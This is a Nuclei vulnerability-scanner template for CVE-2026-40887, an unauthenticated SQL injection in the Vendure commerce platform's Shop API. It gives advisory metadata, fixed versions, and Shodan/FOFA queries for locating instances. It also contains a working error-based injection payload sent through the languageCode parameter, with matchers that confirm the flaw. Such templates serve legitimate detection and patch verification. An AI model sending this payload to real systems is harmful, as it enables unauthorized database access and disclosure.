id: CVE-2026-40887

info:
  name: Vendure Core - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    Vendure, an open-source headless commerce platform built on Node.js/TypeScript, contains a critical SQL injection vulnerability in its Shop API. The languageCode query parameter is interpolated directly into a raw SQL CASE expression in ProductService.findOneBySlug without parameterization or input validation, allowing unauthenticated attackers to execute arbitrary SQL commands. This can lead to full database disclosure and denial of service.
  remediation: Upgrade @vendure/core to version 3.6.2, 3.5.7, or 2.3.4 or later, which add input validation and parameterized queries for the languageCode parameter.
  reference:
    - https://github.com/advisories/GHSA-9pp3-53p2-ww9v
    - https://github.com/vendurehq/vendure/security/advisories/GHSA-9pp3-53p2-ww9v
    - https://github.com/vendurehq/vendure/commit/3ff0bc1
    - https://nvd.nist.gov/vuln/detail/CVE-2026-40887
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2026-40887
    epss-score: 0.07704
    epss-percentile: 0.92063
    cwe-id: CWE-89
  metadata:
    max-request: 2
    verified: true
    shodan-query: http.header:"vendure-auth-token"
    fofa-query: header="vendure-auth-token"
  tags: cve,cve2026,vendure,sqli,unauthenticated

variables:
  num: 999999999

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /shop-api HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"query":"{ __typename }"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "vendure-auth-token")'
          - 'contains(body, "\"data\"")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /shop-api?languageCode=en'+AND+EXTRACTVALUE(5202,CONCAT(0x5c,(SELECT+MD5('{{num}}'))))+AND+'ptic'%3d'ptic HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"query":"{ product(slug: \"a\") { id name } }"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'c8c605999f3d8352d7bb792cf3fd'
          - '"product":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008f4528fc03476616e1b5c9c669f589b65d52470f47f2059d6e2cfaed73ba09f4022028522cca22950d7c5b040db9d65b28eb02cba8e7ee4ef503a7e5789ae3baf6d4:922c64590222798bb761d5b6d8e72950